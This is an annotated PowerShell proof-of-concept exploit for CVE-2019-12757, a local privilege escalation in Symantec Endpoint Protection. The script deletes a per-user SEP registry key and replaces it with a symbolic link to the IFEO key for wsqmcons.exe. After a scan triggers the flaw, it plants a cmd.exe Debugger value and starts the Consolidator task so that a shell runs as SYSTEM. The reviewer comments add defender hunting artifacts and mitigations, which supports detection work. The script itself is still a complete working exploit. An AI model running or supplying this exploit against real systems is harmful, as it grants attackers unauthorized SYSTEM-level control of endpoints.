CVE-2019-12757
# Proof-of-concept for CVE-2019-12757 (per the gist title): a local privilege escalation in
# Symantec Endpoint Protection (SEP) that chains a registry symbolic link with an Image File
# Execution Options (IFEO) "Debugger" value. Everything below is a registry or process side
# effect on the host it runs on; there is no function wrapper, it executes top to bottom.
#
# NOTE(review): the trailing " | |" on every line is a gist-rendering artifact, not PowerShell.
#
# What the script requires, as far as its own lines show: rights to install a PowerShell module
# for the current user, delete/create keys under HKLM\SOFTWARE\WOW6432Node\Symantec, and start a
# scheduled task. It aborts when SEP Tamper Protection is not reported as disabled (else branch).
#
# Defender notes -- artifacts this script produces that can be alerted on or hunted for:
#   - Install-Module / Import-Module of NTObjectManager (NtApiDotNet) on an endpoint
#   - deletion of HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\<SID>
#   - a registry symbolic link created at that Scheduler\<SID> path whose target is
#     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe
#   - creation of the directory C:\exploit and DoScan.exe /ScanDir against it
#   - a new "Debugger" value under the IFEO key for wsqmcons.exe
#   - the "Consolidator" scheduled task being started on demand
# Mitigation: the vendor's fix for CVE-2019-12757, plus keeping Tamper Protection enabled --
# the script itself treats an enabled Tamper Protection as a hard stop.

# NTObjectManager exposes the native NtKey API used for CreateSymbolicLink further down.
# Installed per-user (-Scope CurrentUser) from the configured PowerShell repository, -Force
# suppresses prompts; this is a network install, not a bundled dependency.
Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green" | |
install-module NTObjectManager -Scope CurrentUser -Force | |
import-module NTObjectManager | |
# Tamper Protection gate: reads the "Disabled" value of the SymProtect RealTimeScan storage
# (32-bit hive view via WOW6432Node). Only the literal string/number "1" is treated as
# "disabled"; anything else -- including a missing value, which makes Get-ItemProperty
# error -- falls through to the else branch.
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green" | |
$Result = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled | |
if($Result.Disabled -eq "1") | |
{ | |
# Current user's SID; SEP keeps a per-user subkey under AV\Scheduler named after it,
# and that subkey name is what the symbolic link below is planted as.
$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User | |
$SID = $User.Value | |
Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green" | |
# Delete the real Scheduler\<SID> key so its name is free for the link. -Recurse -Force on a
# path built from $SID -- an empty $SID would target the whole Scheduler key.
Write-Host "[*] Removing registry key..." -ForeGroundColor "Green" | |
Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force | |
# Native-path registry symbolic link: Scheduler\<SID> now resolves to the IFEO key for
# wsqmcons.exe. Arguments are (link path, root key, target path); $null as root means the
# absolute \Registry\Machine path is used. PowerShell's registry provider cannot create
# REG_LINK keys, hence the NtApiDotNet call.
Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green" | |
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe") | |
# Trigger: a scan of a freshly created C:\exploit via DoScan.exe. Presumably the product's
# SYSTEM service then writes to Scheduler\<SID> and, following the link, creates / opens up the
# IFEO key so the unprivileged user can write to it -- that is the inferred vulnerability; the
# script does not show it, it only waits 10 s for it to happen. New-Item's output is not
# suppressed, so the directory object is echoed to the console.
Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green" | |
New-Item -Path "c:\" -Name "exploit" -ItemType "directory" | |
Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit" | |
Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green" | |
# "10" is a string here; Start-Sleep coerces it to -Seconds 10.
Start-Sleep "10" | |
# IFEO Debugger: Windows launches the Debugger string instead of wsqmcons.exe whenever that
# image starts, in the security context of whatever starts it. Written through the normal
# HKLM: provider path, i.e. this step assumes the trigger above made the key writable.
Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green" | |
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe" | |
# The built-in "Consolidator" scheduled task launches wsqmcons.exe; starting it on demand makes
# the Debugger value take effect under the task's account (SYSTEM, per the final message).
Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green" | |
Get-ScheduledTask "Consolidator" | Start-ScheduledTask | |
Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green" | |
} else{ | |
# Tamper Protection reported as enabled: nothing is modified.
Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red" | |
} |